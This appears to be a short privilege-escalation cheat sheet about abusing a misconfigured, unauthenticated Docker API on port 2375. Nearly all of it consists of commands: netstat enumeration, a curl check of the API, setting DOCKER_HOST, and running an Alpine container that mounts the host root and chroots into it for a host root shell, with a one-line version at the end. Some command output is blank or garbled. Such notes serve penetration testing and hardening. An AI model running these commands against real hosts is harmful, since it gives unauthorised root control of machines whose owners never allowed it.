Docker - Escalation of privilege - Misconfigured Docker Socket

  • Escalation

Who I am:



List all processes listening on TCP ports

netstat -tlp
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 localhost:2375*               LISTEN      -                   
tcp        0      0   *               LISTEN      -                   
tcp6       0      0 [::]:ssh                [::]:*                  LISTEN      -           


  • Port 2375: Docker API unencrypted
  • Port 2376: Docker API encrypted


Check if port 2375 is connected to Docker:

curl localhost:2375/version
{"Platform":{"Name":"Docker Engine - Community"},

The Docker client is installed on the machine and uses the default port 2375. Now let's configure the Docker client to use TCP.


export DOCKER_HOST="tcp://localhost:2375"


Start a Container and mount the root of the host machine on a directory of the Container.

docker run -it -v /:/mnt alpine bash

Once inside the container:


chroot /mnt bash


Who I am:



In one line:

docker run -it --rm -v /:/mnt alpine chroot /mnt bash